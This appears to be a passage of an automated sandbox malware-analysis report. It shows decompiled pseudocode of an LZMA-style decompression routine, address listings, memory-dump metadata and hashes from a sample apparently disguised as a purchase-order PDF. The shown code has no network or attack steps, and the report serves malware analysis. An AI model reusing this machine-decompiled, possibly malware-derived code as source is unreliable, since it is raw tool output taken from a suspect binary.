                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							L148:
                                            							_t487 = __ebp - 0x48;
                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                            							__eflags =  *_t487;
                                            							L149:
                                            							__eflags =  *(__ebp - 0x48);
                                            							if( *(__ebp - 0x48) <= 0) {
                                            								__ecx =  *(__ebp - 0x40);
                                            								__ebx =  *(__ebp - 0x50);
                                            								0 = 1;
                                            								__eax = 1 << __cl;
                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            								__eax =  *(__ebp - 0x7c);
                                            								 *(__ebp - 0x44) = __ebx;
                                            								goto L140;
                                            							}
                                            							__eax =  *(__ebp - 0x50);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            							__eax =  *(__ebp - 0x58);
                                            							__esi = __edx + __eax;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__ax =  *__esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								__cx = __ax >> 5;
                                            								__eax = __eax - __ecx;
                                            								__edx = __edx + 1;
                                            								__eflags = __edx;
                                            								 *__esi = __ax;
                                            								 *(__ebp - 0x50) = __edx;
                                            							} else {
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								goto L148;
                                            							} else {
                                            								goto L146;
                                            							}
                                            						case 0x19:
                                            							__eflags = __ebx - 4;
                                            							if(__ebx < 4) {
                                            								 *(__ebp - 0x2c) = __ebx;
                                            								L119:
                                            								_t393 = __ebp - 0x2c;
                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                            								__eflags =  *_t393;
                                            								L120:
                                            								__eax =  *(__ebp - 0x2c);
                                            								__eflags = __eax;
                                            								if(__eax == 0) {
                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            									goto L170;
                                            								}
                                            								__eflags = __eax -  *(__ebp - 0x60);
                                            								if(__eax >  *(__ebp - 0x60)) {
                                            									goto L171;
                                            								}
                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            								__eax =  *(__ebp - 0x30);
                                            								_t400 = __ebp - 0x60;
                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            								__eflags =  *_t400;
                                            								goto L123;
                                            							}
                                            							__ecx = __ebx;
                                            							__eax = __ebx;
                                            							__ecx = __ebx >> 1;
                                            							__eax = __ebx & 0x00000001;
                                            							__ecx = (__ebx >> 1) - 1;
                                            							__al = __al | 0x00000002;
                                            							__eax = (__ebx & 0x00000001) << __cl;
                                            							__eflags = __ebx - 0xe;
                                            							 *(__ebp - 0x2c) = __eax;
                                            							if(__ebx >= 0xe) {
                                            								__ebx = 0;
                                            								 *(__ebp - 0x48) = __ecx;
                                            								L102:
                                            								__eflags =  *(__ebp - 0x48);
                                            								if( *(__ebp - 0x48) <= 0) {
                                            									__eax = __eax + __ebx;
                                            									 *(__ebp - 0x40) = 4;
                                            									 *(__ebp - 0x2c) = __eax;
                                            									__eax =  *(__ebp - 4);
                                            									__eax =  *(__ebp - 4) + 0x644;
                                            									__eflags = __eax;
                                            									L108:
                                            									__ebx = 0;
                                            									 *(__ebp - 0x58) = __eax;
                                            									 *(__ebp - 0x50) = 1;
                                            									 *(__ebp - 0x44) = 0;
                                            									 *(__ebp - 0x48) = 0;
                                            									L112:
                                            									__eax =  *(__ebp - 0x40);
                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            										_t391 = __ebp - 0x2c;
                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                            										__eflags =  *_t391;
                                            										goto L119;
                                            									}
                                            									__eax =  *(__ebp - 0x50);
                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            									__eax =  *(__ebp - 0x58);
                                            									__esi = __edi + __eax;
                                            									 *(__ebp - 0x54) = __esi;
                                            									__ax =  *__esi;
                                            									__ecx = __ax & 0x0000ffff;
                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                            									if( *(__ebp - 0xc) >= __edx) {
                                            										__ecx = 0;
                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            										__ecx = 1;
                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            										__ebx = 1;
                                            										__ecx =  *(__ebp - 0x48);
                                            										__ebx = 1 << __cl;
                                            										__ecx = 1 << __cl;
                                            										__ebx =  *(__ebp - 0x44);
                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                            										__cx = __ax;
                                            										__cx = __ax >> 5;
                                            										__eax = __eax - __ecx;
                                            										__edi = __edi + 1;
                                            										__eflags = __edi;
                                            										 *(__ebp - 0x44) = __ebx;
                                            										 *__esi = __ax;
                                            										 *(__ebp - 0x50) = __edi;
                                            									} else {
                                            										 *(__ebp - 0x10) = __edx;
                                            										0x800 = 0x800 - __ecx;
                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            										 *__esi = __dx;
                                            									}
                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                            										L111:
                                            										_t368 = __ebp - 0x48;
                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                            										__eflags =  *_t368;
                                            										goto L112;
                                            									} else {
                                            										goto L109;
                                            									}
                                            								}
                                            								__ecx =  *(__ebp - 0xc);
                                            								__ebx = __ebx + __ebx;
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            								 *(__ebp - 0x44) = __ebx;
                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            									__ecx =  *(__ebp - 0x10);
                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            									__ebx = __ebx | 0x00000001;
                                            									__eflags = __ebx;
                                            									 *(__ebp - 0x44) = __ebx;
                                            								}
                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                            									L101:
                                            									_t338 = __ebp - 0x48;
                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                            									__eflags =  *_t338;
                                            									goto L102;
                                            								} else {
                                            									goto L99;
                                            								}
                                            							}
                                            							__edx =  *(__ebp - 4);
                                            							__eax = __eax - __ebx;
                                            							 *(__ebp - 0x40) = __ecx;
                                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            							goto L108;
                                            						case 0x1a:
                                            							L56:
                                            							__eflags =  *(__ebp - 0x64);
                                            							if( *(__ebp - 0x64) == 0) {
                                            								 *(__ebp - 0x88) = 0x1a;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x68);
                                            							__al =  *(__ebp - 0x5c);
                                            							__edx =  *(__ebp - 8);
                                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            							 *( *(__ebp - 0x68)) = __al;
                                            							__ecx =  *(__ebp - 0x14);
                                            							 *(__ecx +  *(__ebp - 8)) = __al;
                                            							__eax = __ecx + 1;
                                            							__edx = 0;
                                            							_t192 = __eax %  *(__ebp - 0x74);
                                            							__eax = __eax /  *(__ebp - 0x74);
                                            							__edx = _t192;
                                            							goto L79;
                                            						case 0x1b:
                                            							goto L75;
                                            						case 0x1c:
                                            							while(1) {
                                            								L123:
                                            								__eflags =  *(__ebp - 0x64);
                                            								if( *(__ebp - 0x64) == 0) {
                                            									break;
                                            								}
                                            								__eax =  *(__ebp - 0x14);
                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            								__eflags = __eax -  *(__ebp - 0x74);
                                            								if(__eax >=  *(__ebp - 0x74)) {
                                            									__eax = __eax +  *(__ebp - 0x74);
                                            									__eflags = __eax;
                                            								}
                                            								__edx =  *(__ebp - 8);
                                            								__cl =  *(__eax + __edx);
                                            								__eax =  *(__ebp - 0x14);
                                            								 *(__ebp - 0x5c) = __cl;
                                            								 *(__eax + __edx) = __cl;
                                            								__eax = __eax + 1;
                                            								__edx = 0;
                                            								_t414 = __eax %  *(__ebp - 0x74);
                                            								__eax = __eax /  *(__ebp - 0x74);
                                            								__edx = _t414;
                                            								__eax =  *(__ebp - 0x68);
                                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            								__eflags =  *(__ebp - 0x30);
                                            								 *( *(__ebp - 0x68)) = __cl;
                                            								 *(__ebp - 0x14) = _t414;
                                            								if( *(__ebp - 0x30) > 0) {
                                            									continue;
                                            								} else {
                                            									goto L80;
                                            								}
                                            							}
                                            							 *(__ebp - 0x88) = 0x1c;
                                            							goto L170;
                                            					}
                                            				}
                                            			}













                                            0x00000000
                                            0x004070ab
                                            0x004070ab
                                            0x004070af
                                            0x00407166
                                            0x00407169
                                            0x00407175
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x004073cb
                                            0x004073cb
                                            0x004073ce
                                            0x004073ce
                                            0x004073d4
                                            0x004073da
                                            0x004073e0
                                            0x004073fa
                                            0x004073fd
                                            0x00407403
                                            0x0040740e
                                            0x00407410
                                            0x004073e2
                                            0x004073e2
                                            0x004073f1
                                            0x004073f5
                                            0x004073f5
                                            0x0040741a
                                            0x00407441
                                            0x00407441
                                            0x00407447
                                            0x00407447
                                            0x00000000
                                            0x0040741c
                                            0x0040741c
                                            0x00407420
                                            0x004075cf
                                            0x00000000
                                            0x004075cf
                                            0x0040742c
                                            0x00407433
                                            0x0040743b
                                            0x0040743e
                                            0x00000000
                                            0x0040743e
                                            0x004070b5
                                            0x004070b9
                                            0x004075fa
                                            0x004075fa
                                            0x004075fd
                                            0x00407601
                                            0x00407601
                                            0x004070bf
                                            0x004070c5
                                            0x004070c8
                                            0x004070cc
                                            0x004070cf
                                            0x004070d3
                                            0x00407599
                                            0x004075e5
                                            0x004075ed
                                            0x004075f4
                                            0x004075f6
                                            0x00000000
                                            0x004075f6
                                            0x004070d9
                                            0x004070dc
                                            0x004070e2
                                            0x004070e4
                                            0x004070e4
                                            0x004070e7
                                            0x004070ea
                                            0x004070ed
                                            0x004070f0
                                            0x004070f3
                                            0x004070f6
                                            0x004070f7
                                            0x004070f9
                                            0x004070f9
                                            0x004070f9
                                            0x004070fc
                                            0x004070ff
                                            0x00407102
                                            0x00407105
                                            0x00407105
                                            0x00407108
                                            0x0040710a
                                            0x0040710a
                                            0x0040710d
                                            0x0040710d
                                            0x0040710d
                                            0x00406be3
                                            0x00406be3
                                            0x00406bec
                                            0x00000000
                                            0x00000000
                                            0x00406bf2
                                            0x00000000
                                            0x00406bfd
                                            0x00000000
                                            0x00000000
                                            0x00406c06
                                            0x00406c09
                                            0x00406c0c
                                            0x00406c10
                                            0x00000000
                                            0x00000000
                                            0x00406c16
                                            0x00406c19
                                            0x00406c1b
                                            0x00406c1c
                                            0x00406c1f
                                            0x00406c21
                                            0x00406c22
                                            0x00406c24
                                            0x00406c27
                                            0x00406c2c
                                            0x00406c31
                                            0x00406c3a
                                            0x00406c4d
                                            0x00406c50
                                            0x00406c5c
                                            0x00406c84
                                            0x00406c86
                                            0x00406c94
                                            0x00406c94
                                            0x00406c98
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406c88
                                            0x00406c88
                                            0x00406c8b
                                            0x00406c8c
                                            0x00406c8c
                                            0x00000000
                                            0x00406c88
                                            0x00406c62
                                            0x00406c67
                                            0x00406c67
                                            0x00406c70
                                            0x00406c78
                                            0x00406c7b
                                            0x00000000
                                            0x00406c81
                                            0x00406c81
                                            0x00000000
                                            0x00406c81
                                            0x00000000
                                            0x00406c9e
                                            0x00406c9e
                                            0x00406ca2
                                            0x0040754e
                                            0x00000000
                                            0x0040754e
                                            0x00406cab
                                            0x00406cbb
                                            0x00406cbe
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc1
                                            0x00406cc4
                                            0x00406cc8
                                            0x00000000
                                            0x00000000
                                            0x00406cca
                                            0x00406cd0
                                            0x00406cfa
                                            0x00406d00
                                            0x00406d07
                                            0x00000000
                                            0x00406d07
                                            0x00406cd6
                                            0x00406cd9
                                            0x00406cde
                                            0x00406cde
                                            0x00406ce9
                                            0x00406cf1
                                            0x00406cf4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d39
                                            0x00406d3f
                                            0x00406d42
                                            0x00406d4f
                                            0x00406d57
                                            0x00000000
                                            0x00000000
                                            0x00406d0e
                                            0x00406d0e
                                            0x00406d12
                                            0x0040755d
                                            0x00000000
                                            0x0040755d
                                            0x00406d1e
                                            0x00406d29
                                            0x00406d29
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d32
                                            0x00406d37
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d5f
                                            0x00406d61
                                            0x00406d64
                                            0x00406dd5
                                            0x00406dd8
                                            0x00406ddb
                                            0x00406de2
                                            0x00406dec
                                            0x00000000
                                            0x00406dec
                                            0x00406d66
                                            0x00406d6a
                                            0x00406d6d
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d75
                                            0x00406d77
                                            0x00406d7a
                                            0x00406d7c
                                            0x00406d81
                                            0x00406d84
                                            0x00406d87
                                            0x00406d8b
                                            0x00406d92
                                            0x00406d95
                                            0x00406d9c
                                            0x00406da0
                                            0x00406da8
                                            0x00406da8
                                            0x00406da8
                                            0x00406da2
                                            0x00406da2
                                            0x00406da2
                                            0x00406d97
                                            0x00406d97
                                            0x00406d97
                                            0x00406dac
                                            0x00406daf
                                            0x00406dcd
                                            0x00406dcf
                                            0x00000000
                                            0x00406db1
                                            0x00406db1
                                            0x00406db4
                                            0x00406db7
                                            0x00406dba
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbf
                                            0x00406dc2
                                            0x00406dc4
                                            0x00406dc5
                                            0x00406dc8
                                            0x00000000
                                            0x00406dc8
                                            0x00000000
                                            0x00406ffe
                                            0x00407002
                                            0x00407020
                                            0x00407023
                                            0x0040702a
                                            0x0040702d
                                            0x00407030
                                            0x00407033
                                            0x00407036
                                            0x00407039
                                            0x0040703b
                                            0x00407042
                                            0x00407043
                                            0x00407045
                                            0x00407048
                                            0x0040704b
                                            0x0040704e
                                            0x0040704e
                                            0x00407053
                                            0x00000000
                                            0x00407053
                                            0x00407004
                                            0x00407007
                                            0x0040700a
                                            0x00407014
                                            0x00000000
                                            0x00000000
                                            0x00407068
                                            0x0040706c
                                            0x0040708f
                                            0x00407092
                                            0x00407095
                                            0x0040709f
                                            0x0040706e
                                            0x0040706e
                                            0x00407071
                                            0x00407074
                                            0x00407077
                                            0x00407084
                                            0x00407087
                                            0x00407087
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040711c
                                            0x00407120
                                            0x00407127
                                            0x0040712a
                                            0x0040712d
                                            0x00407137
                                            0x00000000
                                            0x00407137
                                            0x00407122
                                            0x00000000
                                            0x00000000
                                            0x00407143
                                            0x00407147
                                            0x0040714e
                                            0x00407151
                                            0x00407154
                                            0x00407149
                                            0x00407149
                                            0x00407149
                                            0x00407157
                                            0x0040715a
                                            0x0040715d
                                            0x0040715d
                                            0x00407160
                                            0x00407163
                                            0x00000000
                                            0x00000000
                                            0x00407203
                                            0x00407203
                                            0x00407207
                                            0x004075a5
                                            0x00000000
                                            0x004075a5
                                            0x0040720d
                                            0x00407210
                                            0x00407213
                                            0x00407217
                                            0x0040721a
                                            0x00407220
                                            0x00407222
                                            0x00407222
                                            0x00407222
                                            0x00407225
                                            0x00407228
                                            0x00000000
                                            0x00000000
                                            0x00406df8
                                            0x00406df8
                                            0x00406dfc
                                            0x00407569
                                            0x00000000
                                            0x00407569
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0c
                                            0x00406e0f
                                            0x00406e15
                                            0x00406e17
                                            0x00406e17
                                            0x00406e17
                                            0x00406e1a
                                            0x00406e1d
                                            0x00406e1d
                                            0x00406e20
                                            0x00406e23
                                            0x00000000
                                            0x00000000
                                            0x00406e29
                                            0x00406e2f
                                            0x00000000
                                            0x00000000
                                            0x00406e35
                                            0x00406e35
                                            0x00406e39
                                            0x00406e3c
                                            0x00406e3f
                                            0x00406e42
                                            0x00406e45
                                            0x00406e46
                                            0x00406e49
                                            0x00406e4b
                                            0x00406e51
                                            0x00406e54
                                            0x00406e57
                                            0x00406e5a
                                            0x00406e5d
                                            0x00406e60
                                            0x00406e63
                                            0x00406e7f
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8f
                                            0x00406e93
                                            0x00406e95
                                            0x00406e99
                                            0x00406e65
                                            0x00406e65
                                            0x00406e69
                                            0x00406e71
                                            0x00406e76
                                            0x00406e78
                                            0x00406e7a
                                            0x00406e7a
                                            0x00406e9c
                                            0x00406ea3
                                            0x00406ea6
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eac
                                            0x00000000
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406eb5
                                            0x00407575
                                            0x00000000
                                            0x00407575
                                            0x00406ebb
                                            0x00406ebe
                                            0x00406ec1
                                            0x00406ec5
                                            0x00406ec8
                                            0x00406ece
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed3
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406edc
                                            0x00000000
                                            0x00000000
                                            0x00406ede
                                            0x00406ee1
                                            0x00406ee4
                                            0x00406ee7
                                            0x00406eea
                                            0x00406eed
                                            0x00406ef0
                                            0x00406ef3
                                            0x00406ef6
                                            0x00406ef9
                                            0x00406efc
                                            0x00406f14
                                            0x00406f17
                                            0x00406f1a
                                            0x00406f1d
                                            0x00406f1d
                                            0x00406f20
                                            0x00406f24
                                            0x00406f26
                                            0x00406efe
                                            0x00406efe
                                            0x00406f06
                                            0x00406f0b
                                            0x00406f0d
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f29
                                            0x00406f30
                                            0x00406f33
                                            0x00000000
                                            0x00406f35
                                            0x00000000
                                            0x00406f35
                                            0x00406f33
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00000000
                                            0x00000000
                                            0x00406f75
                                            0x00406f75
                                            0x00406f79
                                            0x00407581
                                            0x00000000
                                            0x00407581
                                            0x00406f7f
                                            0x00406f82
                                            0x00406f85
                                            0x00406f89
                                            0x00406f8c
                                            0x00406f92
                                            0x00406f94
                                            0x00406f94
                                            0x00406f94
                                            0x00406f97
                                            0x00406f9a
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406f3e
                                            0x00406f3e
                                            0x00406f41
                                            0x00000000
                                            0x00406f41
                                            0x00406fa2
                                            0x00406fa2
                                            0x00406fa5
                                            0x00406fa8
                                            0x00406fab
                                            0x00406fae
                                            0x00406fb1
                                            0x00406fb4
                                            0x00406fb7
                                            0x00406fba
                                            0x00406fbd
                                            0x00406fc0
                                            0x00406fd8
                                            0x00406fdb
                                            0x00406fde
                                            0x00406fe1
                                            0x00406fe1
                                            0x00406fe4
                                            0x00406fe8
                                            0x00406fea
                                            0x00406fc2
                                            0x00406fc2
                                            0x00406fca
                                            0x00406fcf
                                            0x00406fd1
                                            0x00406fd3
                                            0x00406fd3
                                            0x00406fed
                                            0x00406ff4
                                            0x00406ff7
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00406ff9
                                            0x00000000
                                            0x00407286
                                            0x00407286
                                            0x0040728a
                                            0x004075b1
                                            0x00000000
                                            0x004075b1
                                            0x00407290
                                            0x00407293
                                            0x00407296
                                            0x0040729a
                                            0x0040729d
                                            0x004072a3
                                            0x004072a5
                                            0x004072a5
                                            0x004072a5
                                            0x004072a8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407395
                                            0x00407399
                                            0x004073bb
                                            0x004073be
                                            0x004073c8
                                            0x00000000
                                            0x004073c8
                                            0x0040739b
                                            0x0040739e
                                            0x004073a2
                                            0x004073a5
                                            0x004073a5
                                            0x004073a8
                                            0x00000000
                                            0x00000000
                                            0x00407452
                                            0x00407456
                                            0x00407474
                                            0x00407474
                                            0x00407474
                                            0x0040747b
                                            0x00407482
                                            0x00407489
                                            0x00407489
                                            0x00000000
                                            0x00407489
                                            0x00407458
                                            0x0040745b
                                            0x0040745e
                                            0x00407461
                                            0x00407468
                                            0x004073ac
                                            0x004073ac
                                            0x004073af
                                            0x00000000
                                            0x00000000
                                            0x00407543
                                            0x00407546
                                            0x00000000
                                            0x00000000
                                            0x0040717d
                                            0x0040717f
                                            0x00407186
                                            0x00407187
                                            0x00407189
                                            0x0040718c
                                            0x00000000
                                            0x00000000
                                            0x00407194
                                            0x00407197
                                            0x0040719a
                                            0x0040719c
                                            0x0040719e
                                            0x0040719e
                                            0x0040719f
                                            0x004071a2
                                            0x004071a9
                                            0x004071ac
                                            0x004071ba
                                            0x00000000
                                            0x00000000
                                            0x00407490
                                            0x00407490
                                            0x00407493
                                            0x0040749a
                                            0x00000000
                                            0x00000000
                                            0x0040749f
                                            0x0040749f
                                            0x004074a3
                                            0x004075db
                                            0x00000000
                                            0x004075db
                                            0x004074a9
                                            0x004074ac
                                            0x004074af
                                            0x004074b3
                                            0x004074b6
                                            0x004074bc
                                            0x004074be
                                            0x004074be
                                            0x004074be
                                            0x004074c1
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c4
                                            0x004074c7
                                            0x004074c7
                                            0x004074cb
                                            0x0040752b
                                            0x0040752e
                                            0x00407533
                                            0x00407534
                                            0x00407536
                                            0x00407538
                                            0x0040753b
                                            0x00000000
                                            0x0040753b
                                            0x004074cd
                                            0x004074d3
                                            0x004074d6
                                            0x004074d9
                                            0x004074dc
                                            0x004074df
                                            0x004074e2
                                            0x004074e5
                                            0x004074e8
                                            0x004074eb
                                            0x004074ee
                                            0x00407507
                                            0x0040750a
                                            0x0040750d
                                            0x00407510
                                            0x00407514
                                            0x00407516
                                            0x00407516
                                            0x00407517
                                            0x0040751a
                                            0x004074f0
                                            0x004074f0
                                            0x004074f8
                                            0x004074fd
                                            0x004074ff
                                            0x00407502
                                            0x00407502
                                            0x0040751d
                                            0x00407524
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x00407526
                                            0x00000000
                                            0x004071c2
                                            0x004071c5
                                            0x004071fb
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732b
                                            0x0040732e
                                            0x0040732e
                                            0x00407331
                                            0x00407333
                                            0x004075bd
                                            0x00000000
                                            0x004075bd
                                            0x00407339
                                            0x0040733c
                                            0x00000000
                                            0x00000000
                                            0x00407342
                                            0x00407346
                                            0x00407349
                                            0x00407349
                                            0x00407349
                                            0x00000000
                                            0x00407349
                                            0x004071c7
                                            0x004071c9
                                            0x004071cb
                                            0x004071cd
                                            0x004071d0
                                            0x004071d1
                                            0x004071d3
                                            0x004071d5
                                            0x004071d8
                                            0x004071db
                                            0x004071f1
                                            0x004071f6
                                            0x0040722e
                                            0x0040722e
                                            0x00407232
                                            0x0040725e
                                            0x00407260
                                            0x00407267
                                            0x0040726a
                                            0x0040726d
                                            0x0040726d
                                            0x00407272
                                            0x00407272
                                            0x00407274
                                            0x00407277
                                            0x0040727e
                                            0x00407281
                                            0x004072ae
                                            0x004072ae
                                            0x004072b1
                                            0x004072b4
                                            0x00407328
                                            0x00407328
                                            0x00407328
                                            0x00000000
                                            0x00407328
                                            0x004072b6
                                            0x004072bc
                                            0x004072bf
                                            0x004072c2
                                            0x004072c5
                                            0x004072c8
                                            0x004072cb
                                            0x004072ce
                                            0x004072d1
                                            0x004072d4
                                            0x004072d7
                                            0x004072f0
                                            0x004072f2
                                            0x004072f5
                                            0x004072f6
                                            0x004072f9
                                            0x004072fb
                                            0x004072fe
                                            0x00407300
                                            0x00407302
                                            0x00407305
                                            0x00407307
                                            0x0040730a
                                            0x0040730e
                                            0x00407310
                                            0x00407310
                                            0x00407311
                                            0x00407314
                                            0x00407317
                                            0x004072d9
                                            0x004072d9
                                            0x004072e1
                                            0x004072e6
                                            0x004072e8
                                            0x004072eb
                                            0x004072eb
                                            0x0040731a
                                            0x00407321
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x004072ab
                                            0x00000000
                                            0x00407323
                                            0x00000000
                                            0x00407323
                                            0x00407321
                                            0x00407234
                                            0x00407237
                                            0x00407239
                                            0x0040723c
                                            0x0040723f
                                            0x00407242
                                            0x00407244
                                            0x00407247
                                            0x0040724a
                                            0x0040724a
                                            0x0040724d
                                            0x0040724d
                                            0x00407250
                                            0x00407257
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x0040722b
                                            0x00000000
                                            0x00407259
                                            0x00000000
                                            0x00407259
                                            0x00407257
                                            0x004071dd
                                            0x004071e0
                                            0x004071e2
                                            0x004071e5
                                            0x00000000
                                            0x00000000
                                            0x00406f44
                                            0x00406f44
                                            0x00406f48
                                            0x0040758d
                                            0x00000000
                                            0x0040758d
                                            0x00406f4e
                                            0x00406f51
                                            0x00406f54
                                            0x00406f57
                                            0x00406f5a
                                            0x00406f5d
                                            0x00406f60
                                            0x00406f62
                                            0x00406f65
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6d
                                            0x00406f6d
                                            0x00406f6d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040734c
                                            0x0040734c
                                            0x0040734c
                                            0x00407350
                                            0x00000000
                                            0x00000000
                                            0x00407356
                                            0x00407359
                                            0x0040735c
                                            0x0040735f
                                            0x00407361
                                            0x00407361
                                            0x00407361
                                            0x00407364
                                            0x00407367
                                            0x0040736a
                                            0x0040736d
                                            0x00407370
                                            0x00407373
                                            0x00407374
                                            0x00407376
                                            0x00407376
                                            0x00407376
                                            0x00407379
                                            0x0040737c
                                            0x0040737f
                                            0x00407382
                                            0x00407385
                                            0x00407389
                                            0x0040738b
                                            0x0040738e
                                            0x00000000
                                            0x00407390
                                            0x00000000
                                            0x00407390
                                            0x0040738e
                                            0x004075c3
                                            0x00000000
                                            0x00000000
                                            0x00406bf2

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                            • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                            • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                            • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E00406BB0(void* __ecx) {
                                            				void* _v8;
                                            				void* _v12;
                                            				signed int _v16;
                                            				unsigned int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				signed int _v60;
                                            				signed int _v64;
                                            				signed int _v68;
                                            				signed int _v72;
                                            				signed int _v76;
                                            				signed int _v80;
